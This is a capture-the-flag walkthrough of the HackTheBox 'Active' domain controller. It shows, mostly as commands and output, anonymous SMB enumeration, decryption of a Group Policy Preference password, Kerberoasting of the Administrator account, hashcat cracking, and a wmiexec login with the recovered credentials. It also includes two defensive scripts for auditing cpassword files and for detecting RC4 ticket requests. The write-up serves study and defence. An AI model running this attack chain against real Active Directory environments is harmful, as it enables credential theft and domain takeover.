HTB box walkthrough (Active Directory 101: Active)

nmap scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-29 01:22 EST
Nmap scan report for 10.10.10.100
Host is up (0.61s latency).
Not shown: 982 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-12-29 06:23:10Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49176/tcp open  msrpc         Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:

Network Distance: 2 hops
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2022-12-29T06:24:49
|_  start_date: 2022-12-29T06:19:26
| smb2-security-mode:
|   2.1:
|_    Message signing enabled and required

TRACEROUTE (using port 3306/tcp)
HOP RTT       ADDRESS
1   401.01 ms 10.10.16.1
2   794.14 ms 10.10.10.100

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 193.71 seconds
The target has SMB open with message signing enabled and required, which blocks SMB relay attacks. Next, check whether the SMB shares allow anonymous access.
Anonymous access with smbclient
    Command: smbclient -L //10.10.10.100
        Password for [WORKGROUP\kali]:
        Anonymous login successful

                Sharename       Type      Comment
                ---------       ----      -------
                ADMIN$          Disk      Remote Admin
                C$              Disk      Default share
                IPC$            IPC       Remote IPC
                NETLOGON        Disk      Logon server share
                Replication     Disk
                SYSVOL          Disk      Logon server share
                Users           Disk
        Reconnecting with SMB1 for workgroup listing.
        do_connect: Connection to 10.10.10.100 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
        Unable to connect with SMB1 -- no workgroup available
    Anonymous access works, and the listing shows SYSVOL. In most cases the SYSVOL directory contains Group Policy Preference files that hold credentials: Groups.xml, ScheduledTasks.xml, Services.xml, Printers.xml and Drives.xml.
    Groups.xml only exists when a Group Policy Preference item was created for a user or group, so check whether the file is present and extract the account name and password it stores.
    smbclient //10.10.10.100/Replication
    Password for [WORKGROUP\kali]:
    Anonymous login successful
    Try "help" to get a list of possible commands.
    smb: \> RECURSE ON
    smb: \> PROMPT OFF
    smb: \> mget *
    getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
    getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\GPT.INI of size 22 as active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
    getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\GPE.INI of size 119 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy/GPE.INI (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
    getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2788 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol (0.9 KiloBytes/sec) (average 0.3 KiloBytes/sec)
    getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
    getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 1098 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (0.8 KiloBytes/sec) (average 0.4 KiloBytes/sec)
    getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 3722 as active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (1.5 KiloBytes/sec) (average 0.5 KiloBytes/sec)
    smb: \>
    Found: Groups.xml is present, holding a Group Policy Preference user item.
    The file is at \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml
    In the smb shell:
    get Groups.xml downloads the file.
Decrypt Groups.xml with gpp-decrypt
Contents of Groups.xml:
    <Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
    <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">
    <Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/>
    </User>
    </Groups>
 gpp-decrypt decryption:
    gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
    Plaintext password: GPPstillStandingStrong2k18

 Credentials obtained
    user: active.htb\SVC_TGS
    password: GPPstillStandingStrong2k18
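As a defender-side counterpart to the gpp-decrypt step, here is an added example (not from the original post) that audits a SYSVOL or Replication copy for Group Policy Preference files still carrying a cpassword attribute; the sample Groups.xml is constructed with a placeholder cpassword, and any hit means the preference item should be deleted and the account's password reset.

```python
import os
import xml.etree.ElementTree as ET

# GPP XML files that can carry a cpassword attribute.
GPP_FILES = {"Groups.xml", "ScheduledTasks.xml", "Services.xml",
             "Printers.xml", "Drives.xml", "DataSources.xml"}

# Constructed sample mirroring the structure of the Groups.xml found on the
# Replication share; the cpassword value is a placeholder, not the real one.
SAMPLE_GROUPS_XML = """<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\\SVC_TGS"
        image="2" changed="2018-07-18 20:46:06"
        uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">
    <Properties action="U" newName="" fullName="" description=""
                cpassword="PLACEHOLDER_CPASSWORD_VALUE" changeLogon="0"
                noChange="1" neverExpires="1" acctDisabled="0"
                userName="active.htb\\SVC_TGS"/>
  </User>
</Groups>
"""


def find_cpasswords(xml_text, path="<memory>"):
    """Return one finding per <Properties> element with a non-empty cpassword."""
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError as exc:
        return [{"file": path, "error": str(exc)}]
    findings = []
    # Walk parent/child pairs so the item name and last-changed date can be
    # reported next to the element that actually stores the credential.
    for item in root.iter():
        for props in item:
            cpw = props.get("cpassword")
            if not cpw:                 # attribute absent or empty: no secret
                continue
            findings.append({
                "file": path,
                "item": item.get("name", item.tag),
                "changed": item.get("changed", ""),
                # account attribute differs by file type (userName, runAs, accountName)
                "account": (props.get("userName") or props.get("runAs")
                            or props.get("accountName") or "<unknown>"),
                "cpassword_len": len(cpw),
            })
    return findings


def scan_sysvol(root_dir):
    """Walk a SYSVOL (or Replication) copy and audit every GPP XML file in it."""
    findings = []
    for dirpath, _, filenames in os.walk(root_dir):
        for name in filenames:
            if name in GPP_FILES:
                full = os.path.join(dirpath, name)
                with open(full, encoding="utf-8-sig") as fh:  # GPP files may carry a BOM
                    findings.extend(find_cpasswords(fh.read(), full))
    return findings
```

Run scan_sysvol() against the directory tree that smbclient's mget produced to check every policy at once.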
Get the user flag
smbclient //10.10.10.100/Users -U SVC_TGS
Flag location: \SVC_TGS\Desktop\user.txt
Query SPNs with ldapsearch or GetUserSPNs.py
ldapsearch:
    ldapsearch -x -H ldap://10.10.10.100 -D 'SVC_TGS' -w 'GPPstillStandingStrong2k18' -b 'dc=active,dc=htb' -s sub "(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*))" servicePrincipalName
Output:
    # extended LDIF
    #
    # LDAPv3
    # base <dc=active,dc=htb> with scope subtree
    # filter: (&(objectCategory=person)(objectClass=user)(servicePrincipalName=*))
    # requesting: servicePrincipalName
    #

    # Administrator, Users, active.htb
    dn: CN=Administrator,CN=Users,DC=active,DC=htb
    servicePrincipalName: active/CIFS:445

    # krbtgt, Users, active.htb
    dn: CN=krbtgt,CN=Users,DC=active,DC=htb
    servicePrincipalName: kadmin/changepw

    # search reference
    ref: ldap://ForestDnsZones.active.htb/DC=ForestDnsZones,DC=active,DC=htb

    # search reference
    ref: ldap://DomainDnsZones.active.htb/DC=DomainDnsZones,DC=active,DC=htb

    # search reference
    ref: ldap://active.htb/CN=Configuration,DC=active,DC=htb

    # search result
    search: 2
    result: 0 Success

    # numResponses: 6
    # numEntries: 2
    # numReferences: 3
    Key point: servicePrincipalName: active/CIFS:445 shows that Administrator has an SPN configured, so Kerberoasting can be attempted.

GetUserSPNs.py query
Command: python3 GetUserSPNs.py active.htb/svc_tgs -dc-ip 10.10.10.100 -request
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

Password:
ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2022-12-29 01:20:27.010143
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$9e62f2d972f0d970fefb01926fa36906$e92a510697739ade8c64475c527fbc50899330be417cefb3e193113a26a52befde837ca0c4d22df122e6ccff66d3f37d18f2fe325b7f26e201d0137029a97cee3a8b160c7d003099dbcd84487a6a4c4b0bd9e85746da8972d0bf007bf287feed1b9b3a1dfee1a83e41e34161c940db99a7bec6ea6d397cf79b65aeacbd2add152c8b1fd55280c790d77df44843e182536fbea432c4491d1493f11f2608d7d4b824e70c230039606e2f3a03c3efaf7313c37e88daac3674dc5690246e63d20f9076accb63f42e64c184c9c2b41f6eebc1ff4b591f73e1ac7667acd086c590bdce5ef5f3ac4aecc62e8481a4e4ba8e9b9b8d3da767638957336c6ef649c1a32fef279bde6c32f7e101ada45059985e2e3998ead3ff3df5dd7a83cc9da757e093b2143ae893ff4acb8f1d4f28addf0926d5d8dcbb1be70a56bf79c307fa7a8fcfc8b9c3d8eaa4bea5608621fef9039bfb73681d434e0663cf54a38659763ae7adc75125e127fad67d29d04bba43ee3de091f70a55b2fb7576e000cf3b7bbad8052e87da66dc30f797fc5e11d46a76ecf449c445365fe3a5082a4d015dda114cd408ad205f6c336c3671eb60779eab57418fffb59e9dd14b45c4e77491a72ea5e09e21685de2aa0b7952cd03abf47defe08b35f9aa1dc161f0b8d23a1ec76cabeda03a0b1a6cded15aef7273516995d253729e9e5abec19a0d31e27c612746fcd62fc416f87c366c64e755d0749164bc62c27d94163e0e06bf39a9b6ef5d4f417ba3c06f7d1b3f3f6e25ed164cc4647748065e82b371f59e33d94b1136ed71adad1b28c8e623fb689523870e3eea6c0c92837d16f8c57f3306373966b8ae631296be7d4ddb140b656e5a4a9ecdde52747ace0c040a32786ddac9fdf22cbbe52ab5977b4ba29270842ba5d6f5efbef1103272c0e4eea6c306b72a19fbcf933dbf5e3ecb6fa37333886f10617254f6615faff728da9df4b863ef9c5f2fcef34912089009671c4cce04c18bfbb05ef234892125632b6e7c4b47f44fc007d326974bfbb5bfb522ed16cbf4e89f974741bf4c9011e0ad0db40973fab0662cb32ffbcf4c08d2082e868835a625ffc7c5199765dfe41cac0c95c2f9d14cb04cda62858b812455373f7da00da51bae5e52941ce7df5a65af469884fe1692e687fd876a00230be9ba80c8b1156466c6c09f9a2f57439ef4aacbcac023eb1a1389eaf88e7214591c9cfe6acfa61610c14a8f7d63940f42788b62392f0a4f20fdea
Crack the TGS hash with hashcat (the ticket is encrypted with the account's NTLM hash)
hash.txt: the $krb5tgs$23$ hash printed by GetUserSPNs.py, saved to a file
hashcat command:
    hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt --force --potfile-disable
               Mode 13100 is Kerberos 5, etype 23, TGS-REP
 Output:
    hashcat (v6.2.5) starting

    You have enabled --force to bypass dangerous warnings and errors!
    This can hide serious problems and should only be done when debugging.
    Do not report hashcat issues encountered when using --force.

    OpenCL API (OpenCL 2.0 pocl 1.8  Linux, None+Asserts, RELOC, LLVM 11.1.0, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
    =====================================================================================================================================
    * Device #1: pthread-12th Gen Intel(R) Core(TM) i5-12400F, 1428/2921 MB (512 MB allocatable), 4MCU

    Minimum password length supported by kernel: 0
    Maximum password length supported by kernel: 256

    Hashes: 1 digests; 1 unique digests, 1 unique salts
    Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
    Rules: 1

    Optimizers applied:
    * Zero-Byte
    * Not-Iterated
    * Single-Hash
    * Single-Salt

    ATTENTION! Pure (unoptimized) backend kernels selected.
    Pure kernels can crack longer passwords, but drastically reduce performance.
    If you want to switch to optimized kernels, append -O to your commandline.
    See the above message to find out about the exact limits.

    Watchdog: Temperature abort trigger set to 90c

    Host memory required for this attack: 0 MB

    Dictionary cache hit:
    * Filename..: /usr/share/wordlists/rockyou.txt
    * Passwords.: 14342306
    * Bytes.....: 139917341
    * Keyspace..: 14342306

    Cracking performance lower than expected?

    * Append -O to the commandline.
    This lowers the maximum supported password/salt length (usually down to 32).

    * Append -w 3 to the commandline.
    This can cause your screen to lag.

    * Append -S to the commandline.
    This has a drastic speed impact but can be better for specific attacks.
    Typical scenarios are a small wordlist but a large ruleset.

    * Update your backend API runtime / driver the right way:
    https://hashcat.net/faq/wrongdriver

    * Create more work items to make use of your parallelization power:
    https://hashcat.net/faq/morework

    $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$8452d42ef91379f18766c6dad496e2ad$...:Ticketmaster1968

    Session..........: hashcat
    Status...........: Cracked
    Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
    Hash.Target......: $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Ad...b39dff
    Time.Started.....: Thu Dec 29 09:04:58 2022, (9 secs)
    Time.Estimated...: Thu Dec 29 09:05:07 2022, (0 secs)
    Kernel.Feature...: Pure Kernel
    Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
    Guess.Queue......: 1/1 (100.00%)
    Speed.#1.........:  1089.9 kH/s (0.47ms) @ Accel:256 Loops:1 Thr:1 Vec:8
    Recovered........: 1/1 (100.00%) Digests
    Progress.........: 10535936/14342306 (73.46%)
    Rejected.........: 0/10535936 (0.00%)
    Restore.Point....: 10534912/14342306 (73.45%)
    Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
    Candidate.Engine.: Device Generator
    Candidates.#1....: Tigerfeet70 -> TiAmoPanPeter1311
    Hardware.Mon.#1..: Util: 48%

    Started: Thu Dec 29 09:04:40 2022
    Stopped: Thu Dec 29 09:05:09 2022   

 Credentials obtained
    active.htb/Administrator
    Ticketmaster1968
Log in to the domain controller with impacket wmiexec
cd impacket-impacket_0_9_22/examples
python3 wmiexec.py active.htb/Administrator:Ticketmaster1968@10.10.10.100
System flag
type C:\Users\Administrator\Desktop\root.txt
Other ways to enumerate SPNs
setspn.exe -T active.htb -F -Q */*

[*] SMBv2.1 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>setspn.exe -T active.htb -F -Q */*
Checking forest DC=active,DC=htb
CN=Administrator,CN=Users,DC=active,DC=htb
        active/CIFS:445
CN=DC,OU=Domain Controllers,DC=active,DC=htb
        ldap/DC.active.htb/ForestDnsZones.active.htb
        ldap/DC.active.htb/DomainDnsZones.active.htb
        TERMSRV/DC
        TERMSRV/DC.active.htb
        Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/DC.active.htb
        DNS/DC.active.htb
        GC/DC.active.htb/active.htb
        RestrictedKrbHost/DC.active.htb
        RestrictedKrbHost/DC
        HOST/DC/ACTIVE
        HOST/DC.active.htb/ACTIVE
        HOST/DC
        HOST/DC.active.htb
        HOST/DC.active.htb/active.htb
        E3514235-4B06-11D1-AB04-00C04FC2DCD2/f4953ea5-0f30-4041-b4dd-1a00693a8510/active.htb
        ldap/DC/ACTIVE
        ldap/f4953ea5-0f30-4041-b4dd-1a00693a8510._msdcs.active.htb
        ldap/DC.active.htb/ACTIVE
        ldap/DC
        ldap/DC.active.htb
        ldap/DC.active.htb/active.htb
CN=krbtgt,CN=Users,DC=active,DC=htb
        kadmin/changepw

Existing SPN found!

Export the Administrator service ticket
Commands (PowerShell):
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "active/CIFS:445"
Add-Type -Assembly "System.IO.Compression.FileSystem"
[System.IO.Compression.ZipFile]::CreateFromDirectory("c:\temp\kirbi\","c:\temp\kirbi.zip")

Crack the service ticket hash with kirbi2john.py and john; this works the same way as the hashcat step above
/opt/JohnTheRipper/run/kirbi2john.py 1-40a00000-svc_tgs@active~CIFS~445-ACTIVE.HTB.kirbi > hashes.txt
/opt/JohnTheRipper/run/john --format:krb5tgs hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
A brief note on Kerberoasting and KDC authentication
KDC authentication:
1.KRB_AS_REQ(request TGT)      ->             KDC
2.KRB_AS_REP(receive TGT)      <-             KDC
3.KRB_TGS_REQ(present TGT and request TGS) -> KDC
4.KRB_TGS_REP(receive TGS)     <-             KDC
5.KRB_AP_REQ(present TGS for service access) -> Database Server (SPN: MSSQLSvc/SRVSQL01.CORP.LOCAL) running in the context of the domain service account "SVC-MSSQL"
Explanation
KRB_AS_REQ(request TGT)
    The user's password is converted into an NTLM hash, which is used to authenticate the request for a Ticket Granting Ticket (TGT).
KRB_AS_REP(receive TGT)
    The DC (KDC) checks the Authentication Service request (AS_REQ), verifies the user information and creates a Ticket Granting Ticket (TGT), which is returned to the user (AS_REP).
KRB_TGS_REQ(present TGT and request TGS)
    When the user requests a Ticket Granting Service (TGS) ticket for a specific service instance (TGS_REQ), the user presents the TGT to the DC; if the TGT passes validation, its data is copied to build the TGS ticket.
KRB_TGS_REP(receive TGS)
    The TGS ticket is encrypted with the NTLM password hash of the account that runs the service instance (the service computer or service account) and returned to the user (TGS_REP).
KRB_AP_REQ(present TGS for service access)
    The user presents the TGS ticket to the service; if it is valid, the user can connect to the service instance (AP_REQ).
Kerberoasting attack
    Kerberoasting targets the KRB_TGS_REP step: the service ticket for an SPN is encrypted with the service account's NTLM hash. The attacker requests an RC4-encrypted service ticket (ST) and then tries to crack it offline to recover the password of the user account that owns the SPN;
    when that account's password is short, the crack has a good chance of succeeding.
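The RC4 service tickets that Kerberoasting requests are logged on the DC as Security event 4769, so this added example (not part of the original post) shows the detection logic over constructed 4769 events: a successful TGS request with TicketEncryptionType 0x17 for a non-computer service account, with the number of distinct service accounts per requester as the signal. The field names follow the 4769 event schema; the source IPs and the jdoe and sqlsvc names are constructed.

```python
from collections import defaultdict

RC4_ETYPES = {"0x17", "0x18"}   # RC4-HMAC and RC4-HMAC-EXP ticket encryption

# Constructed 4769 events (one per line, key=value), not captured from the box.
# Lines 2 and 5 are what roasting Administrator and a second service account
# look like; line 7 is the same SPN requested with AES (0x12), which is the
# mitigated case (account limited to AES keys, or a long password).
SAMPLE_4769 = """\
TargetUserName=svc_tgs@ACTIVE.HTB ServiceName=DC$ TicketEncryptionType=0x12 Status=0x0 IpAddress=10.10.14.5
TargetUserName=svc_tgs@ACTIVE.HTB ServiceName=Administrator TicketEncryptionType=0x17 Status=0x0 IpAddress=10.10.14.5
TargetUserName=svc_tgs@ACTIVE.HTB ServiceName=krbtgt TicketEncryptionType=0x17 Status=0x0 IpAddress=10.10.14.5
TargetUserName=jdoe@ACTIVE.HTB ServiceName=DC$ TicketEncryptionType=0x12 Status=0x0 IpAddress=10.10.10.50
TargetUserName=svc_tgs@ACTIVE.HTB ServiceName=sqlsvc TicketEncryptionType=0x17 Status=0x0 IpAddress=10.10.14.5
TargetUserName=svc_tgs@ACTIVE.HTB ServiceName=Administrator TicketEncryptionType=0x17 Status=0x1F IpAddress=10.10.14.5
TargetUserName=jdoe@ACTIVE.HTB ServiceName=Administrator TicketEncryptionType=0x12 Status=0x0 IpAddress=10.10.10.50
"""


def parse_4769(text):
    """Parse key=value event lines into one dict per event."""
    return [dict(kv.split("=", 1) for kv in line.split())
            for line in text.splitlines() if line.strip()]


def is_roastable_request(ev):
    """True when a service ticket for a user account was issued with an RC4 key."""
    svc = ev.get("ServiceName", "")
    return (ev.get("Status") == "0x0"                          # ticket actually issued
            and ev.get("TicketEncryptionType", "").lower() in RC4_ETYPES
            and not svc.endswith("$")        # computer accounts: long random passwords
            and svc.lower() != "krbtgt")     # TGT renewals/referrals, not a service key


def kerberoast_report(events, threshold=2):
    """Group RC4 service-ticket requests by (requester, source IP) and return
    the requesters that collected tickets for at least `threshold` service accounts."""
    tickets = defaultdict(set)
    for ev in events:
        if is_roastable_request(ev):
            key = (ev.get("TargetUserName", ""), ev.get("IpAddress", ""))
            tickets[key].add(ev["ServiceName"])
    return {who: sorted(svcs) for who, svcs in tickets.items()
            if len(svcs) >= threshold}
```

On this box the Administrator account itself carries the SPN, so a single RC4 request for it is already worth an alert; lower the threshold to 1 for privileged accounts.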
Summary
An nmap scan showed the target is a domain controller. Anonymous SMB access with smbclient succeeded and exposed SYSVOL; Groups.xml was decrypted with gpp-decrypt,
yielding the active.htb\SVC_TGS credentials. GetUserSPNs.py showed that Administrator has an SPN, so Kerberoasting was attempted and hashcat cracked the ticket hash,
giving the active.htb/Administrator credentials, which were used with wmiexec to log in to the domain controller.
Tools:
nmap
smbclient
gpp-decrypt
GetUserSPNs.py
ldapsearch
hashcat
wmiexec